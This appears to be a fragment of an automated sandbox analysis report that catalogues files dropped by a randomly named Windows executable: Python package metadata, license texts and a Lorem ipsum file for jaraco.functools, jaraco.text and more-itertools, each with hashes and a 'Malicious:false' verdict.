                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2891
                                                                                                                                                                                                                              Entropy (8bit):5.034580807599395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEmbsaC3J1x9Ie9okNGwQw8wQw2wTw0zCPU0+I65Jib0H++kv0gM5d0DT+heU04u:DEmgaCZ1nTGDbHRAnzpI6o+fX5dFSwTm
                                                                                                                                                                                                                              MD5:C2E6BDA7F1B03B39BF42D31B6DBF6C38
                                                                                                                                                                                                                              SHA1:B7A18F079DE22D10C4C318E54BD8C48177F91333
                                                                                                                                                                                                                              SHA-256:8B86946900D7FA38DD1102B9C1EBE17A0CB1F09C8B7E29F61F2BDA4A4DC51ECA
                                                                                                                                                                                                                              SHA-512:F4E892B3D41482E3B17642B1D722B6E2A8E8DD4833F0623C29ED2D50D55CFC68DA1F9756B4E08723DC89F3E552424096C92912AC4DA533FE8E2DC59DC19EA9CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.functools.Version: 4.0.1.Summary: Functools like those found in stdlib.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.functools.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest >=6 ;
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                              Entropy (8bit):5.807846597836061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Tmn/2zDRvbqfuggoaGnXamZlKZBX3vpBvt+c0X4yWJV:TmnuXRzUuggDifZlmX/aWJV
                                                                                                                                                                                                                              MD5:85FB54BAFB143CD57D1787F7EF74FDB2
                                                                                                                                                                                                                              SHA1:A915BBCDF108A58F3DFC1783D9D4DD3B7F3CE23A
                                                                                                                                                                                                                              SHA-256:632AA7C04F7C4BCC01C027AF5B9BC76FE8958F4A181035B957A3BD3014BA248B
                                                                                                                                                                                                                              SHA-512:2A39B4C6F221F88EC61D584C8CD3CAD358E8C7B50E529192105A0A4144ED3C2A4CE8B630C39C18D20E27FE226A23E2DE23CDFF8E3D3693959B165A9A2F9047CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.functools-4.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.functools-4.0.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.functools-4.0.1.dist-info/METADATA,sha256=i4aUaQDX-jjdEQK5wevhegyx8JyLfin2HyvaSk3FHso,2891..jaraco.functools-4.0.1.dist-info/RECORD,,..jaraco.functools-4.0.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.functools-4.0.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/functools/__init__.py,sha256=hEAJaS2uSZRuF_JY4CxCHIYh79ZpxaPp9OiHyr9EJ1w,16642..jaraco/functools/__init__.pyi,sha256=gk3dsgHzo5F_U74HzAvpNivFAPCkPJ1b2-yCd62dfnw,3878..jaraco/functools/__pycache__/__init__.cpython-312.pyc,,..jaraco/functools/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                              MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                              SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                              SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3658
                                                                                                                                                                                                                              Entropy (8bit):5.02710641474483
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DYMaCFS802Vpnu388Ksc+fIybwFiR8g6RSwTsL:pFz02Vpnu388KB+gybwgRd6RSwTsL
                                                                                                                                                                                                                              MD5:70FE732EDE8F8E6C84DA4EA21D4933E5
                                                                                                                                                                                                                              SHA1:A7763789FA56CEBBAA849368FAAC7D386F170399
                                                                                                                                                                                                                              SHA-256:03359D9BA56231F0CE3E840C7CB5A7DB380141218949CCAA78DDBD4DCB965D52
                                                                                                                                                                                                                              SHA-512:4C8D3D5078840BD4DBE20458EBF52890585C5911C22C3EFCE2FB28985461BC80469339DDAF6016FB099C84BDF9B41A26FF1884B456422A8D0C682104D7950D91
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: jaraco.text.Version: 3.12.1.Summary: Module for text manipulation.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.text.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.functools.Requires-Dist: jaraco.context >=4.1.Requires-Dist: autocommand.Requires-Dist: inflect.Requires-Dist: more-itertools.Requires-Dist: importlib-resources ; python_version < "3.9".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1500
                                                                                                                                                                                                                              Entropy (8bit):5.794249493238335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TkLFn/2zDVLFvbqfuaLFo2kXLFGnLFEsJiLFXamdLFlKbkZ6d3JpPXu/1XWXYXw2:TcnuXDzUuuCw5Jmfblyz3Jp2/NUsM0bN
                                                                                                                                                                                                                              MD5:39FCCE64BC768C2046067E4AAD8465F0
                                                                                                                                                                                                                              SHA1:2EFC0FC776576A8FE01BBACD0760A49EEE6481DA
                                                                                                                                                                                                                              SHA-256:816D945741DCA246099388CA3EED74FC0667ACBAA36F70B559B2494C3979B1F6
                                                                                                                                                                                                                              SHA-512:FB2335A6675F9CADEEE38B666FAB9EA1D8BFBA6B7768253D42F44149591A3239F4B2FA19DDF2C282DC7E47A01D7DCA69AADBBCDAC9107EDBCB2C22D11BA81287
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.text-3.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.text-3.12.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.text-3.12.1.dist-info/METADATA,sha256=AzWdm6ViMfDOPoQMfLWn2zgBQSGJScyqeN29TcuWXVI,3658..jaraco.text-3.12.1.dist-info/RECORD,,..jaraco.text-3.12.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.text-3.12.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.text-3.12.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/text/Lorem ipsum.txt,sha256=N_7c_79zxOufBY9HZ3yzMgOkNv-TkOTTio4BydrSjgs,1335..jaraco/text/__init__.py,sha256=Y2YUqXR_orUoDaY4SkPRe6ZZhb5HUHB_Ah9RCNsVyho,16250..jaraco/text/__pycache__/__init__.cpython-312.pyc,,..jaraco/text/__pycache__/layouts.cpython-312.pyc,,..jaraco/text/__pycache__/show-newlines.cpython-312.pyc,,..jaraco/text/__pycache__/strip-prefix.cpython-312.pyc,,..jaraco/text/__py
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7
                                                                                                                                                                                                                              Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                              MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                              SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                              SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                              SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:jaraco.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1335
                                                                                                                                                                                                                              Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                              MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                              SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                              SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                              SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1053
                                                                                                                                                                                                                              Entropy (8bit):5.0945274555157285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:arOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:aSJrlxEvdQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:3396EA30F9D21389D7857719816F83B5
                                                                                                                                                                                                                              SHA1:0D43A836DAC65C0EA426AD49C881A1086600BF85
                                                                                                                                                                                                                              SHA-256:09F1C8C9E941AF3E584D59641EA9B87D83C0CB0FD007EB5EF391A7E2643C1A46
                                                                                                                                                                                                                              SHA-512:D43092223392EDDA3BD777625F5BF54ACB0CC00C25555A4F8A16DB9CCDAFC380D3204486CB2A5FDC9D3F9E459B1FED948FFC7000AA0E40F37B807A01F4421294
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Copyright (c) 2012 Erik Rose..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SO
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36293
                                                                                                                                                                                                                              Entropy (8bit):3.717596190655759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:bs9cnyPtWIRmL0QnCHx4Zi3XBB9GcF89oi+odVBqCv9d3m24TeYH5AvDpG27IFf5:Ua+H1Nsg/
                                                                                                                                                                                                                              MD5:5BA05B51B603386707E1E3A101CDD6B3
                                                                                                                                                                                                                              SHA1:FFCCEC7FD799CC4AB07530954FEF3BE2472E2C23
                                                                                                                                                                                                                              SHA-256:0453BDD0EF9F2CD89540CA63EE8212E73B73809514419DD3037D8FE471F737E0
                                                                                                                                                                                                                              SHA-512:FE7F7D6B6C8089B09A18930EF462BA4C7A15EAF6D3E8610AC655ECADE16CE31D9C01ECE84C88A3C2D9DD34DE70E194A020E28179CF33B21389EE3EEFC7229B74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: more-itertools.Version: 10.3.0.Summary: More routines for operating on iterables, beyond itertools.Keywords: itertools,iterator,iteration,filter,peek,peekable,chunk,chunked.Author-email: Erik Rose <erikrose@grinchcentral.com>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: Py
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1259
                                                                                                                                                                                                                              Entropy (8bit):5.794423512787632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Bhxn/2zDahxvIhxphxBhxEsJXhxzvXiCflBJRHXoggtqgmf7WJhmsxmwG:hnuXwOph5J3zvXi4Lo7qgQ7WJhS
                                                                                                                                                                                                                              MD5:178EE325409DD28809AD3661E8819EF8
                                                                                                                                                                                                                              SHA1:F5844FAC6E3C9133FE5F1B8195EE801959801DF3
                                                                                                                                                                                                                              SHA-256:77C8E73E018DC0FD7E9ED6C80B05A4404545F641FB085220CE42B368B59AA3D3
                                                                                                                                                                                                                              SHA-512:2DB06B622F644674BF7D7AD8B780F9802858D15D73B5075139C2D82181DD6D589B90172BCA7AE9C785E705F447F523DB2AE641826C550C599551A7D8C2396FC2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:more_itertools-10.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..more_itertools-10.3.0.dist-info/LICENSE,sha256=CfHIyelBrz5YTVlkHqm4fYPAyw_QB-te85Gn4mQ8GkY,1053..more_itertools-10.3.0.dist-info/METADATA,sha256=BFO90O-fLNiVQMpj7oIS5ztzgJUUQZ3TA32P5HH3N-A,36293..more_itertools-10.3.0.dist-info/RECORD,,..more_itertools-10.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..more_itertools-10.3.0.dist-info/WHEEL,sha256=rSgq_JpHF9fHR1lx53qwg_1-2LypZE_qmcuXbVUq948,81..more_itertools/__init__.py,sha256=dtAbGjTDmn_ghiU5YXfhyDy0phAlXVdt5klZA5fUa-Q,149..more_itertools/__init__.pyi,sha256=5B3eTzON1BBuOLob1vCflyEb2lSd6usXQQ-Cv-hXkeA,43..more_itertools/__pycache__/__init__.cpython-312.pyc,,..more_itertools/__pycache__/more.cpython-312.pyc,,..more_itertools/__pycache__/recipes.cpython-312.pyc,,..more_itertools/more.py,sha256=1E5kzFncRKTDw0cYv1yRXMgDdunstLQd1QStcnL6U90,148370..more_itertools/more.pyi,sha256=iXXeqt48Nxe8VGmIWpkVXuKpR2FYNuu2DU8nQL
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
